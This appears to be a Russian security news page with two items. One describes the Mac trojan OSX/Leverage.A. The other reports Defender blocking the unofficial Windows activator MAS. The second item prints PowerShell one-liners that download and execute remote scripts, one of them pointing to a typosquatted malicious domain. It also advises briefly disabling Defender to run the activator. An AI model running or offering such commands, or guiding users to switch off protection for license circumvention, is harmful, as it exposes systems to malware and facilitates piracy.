Новый Mac-вредонос работает в интересах Сирийской электронной армии

Новый Mac-вредонос работает в интересах Сирийской электронной армии

Специализирующаяся на ИТ-безопасности компания Intego сообщает об обнаружении нового вредоносного кода под операционную систему Mac OS X , поолучившего название OSX/Leverage.A. Новинка представляет собой коммандно-контрольный троянец, работа которого указывает на причастность к нему так называемой Сирийской электронной армии. Новинка впервые была обнаружена несколько дней назад и сегодня Apple заблокировала работу троянца через XProtect. В Intego говорят, что прежде Apple не имела столь высокой скорости реакции на появление Maс-вредоносов.

Как рассказали специалисты, троянец распространяется через фото двух целующихся людей, представляющих собой сцену из американского ТВ-шоу Leverage. Именно оно послужило основой для имени троянца, сообщает cybersecurity.ru.

Когда пользователь открывает файл с троянцем, происходит запуск штатного вьюэра Apple Preview., так как по всем признакам запущенный файл - картинка. Однако вместе с картинкой происходит и установка троянского софта. В компании говорят, что на запуск стороннего троянца ничего не указывает и в Dock или при вызове меню Command-Tab.

Сам по себе троянец размещается как приложение UserEvent.app и устанавливается в папку /Users/Shared, также он устанавливает стартовый агент UserEvent.System.plist в папку лонч-агентов текущего пользователя Mac. Intego указывает на то, что во время работы троянец, судя по всему, связан с Сирийской электронной армией, передавая данные в интересах этой хакерской группы.

Компания отмечает, что пока троянец не получил широкого распространения и затронул сравнительно небольшую группу людей, данные с компьютеров которых передавались на контрольные серверы хакеров.

Microsoft Defender посчитал MAS вредоносом и заблокировал активацию Windows

Microsoft, похоже, решила всерьёз взяться за Microsoft Activation Scripts (MAS) — популярный инструмент с открытым исходным кодом для активации Windows. Компания знает, что под именем MAS в Сети давно распространяются фейковые сайты и зловредные скрипты, и начала автоматически блокировать их с помощью Microsoft Defender. Проблема в том, что под раздачу внезапно попал и настоящий MAS.

Пользователи заметили, что при попытке запустить команду активации через PowerShell система резко обрывает процесс, а Defender помечает скрипт как угрозу с детектом Trojan:PowerShell/FakeMas.DA!MTB.

Выглядит тревожно — но, судя по всему, это обычное ложноположительное срабатывание, а не целенаправленная «война» Microsoft с оригинальным проектом.

Важно понимать контекст. Совсем недавно разработчики MAS сами подтвердили, что в Сети появились поддельные сайты, распространяющие вредоносные версии скрипта. И вся разница между настоящей и фишинговой командой — в одном символе домена:

  • Оригинальный MAS:
    irm https://get.activated.win | iex
  • Вредоносная подделка:
    irm https://get.activate.win | iex
    (без буквы d)

По всей видимости, Microsoft добавила в чёрный список слишком широкий набор доменов — и вместе с фейком заблокировала легитимный адрес. Ирония ситуации в том, что антивирус может мешать безопасному скрипту, тогда как фишинговый вариант теоретически мог остаться незамеченным.

На данный момент пользователям, у которых Defender включён (а он активен по умолчанию), приходится временно отключать защиту в Центре безопасности, выполнять активацию и сразу же включать защиту обратно. Решение не самое приятное, но рабочее — при одном важном условии.

Критически важно внимательно проверять домен. Отключать защиту и запускать фишинговый скрипт — это прямой путь к заражению системы, утечке данных и другим крайне неприятным последствиям.

Скорее всего, Microsoft исправит фильтрацию в одном из ближайших обновлений сигнатур Defender.

RSS: Новости на портале Anti-Malware.ru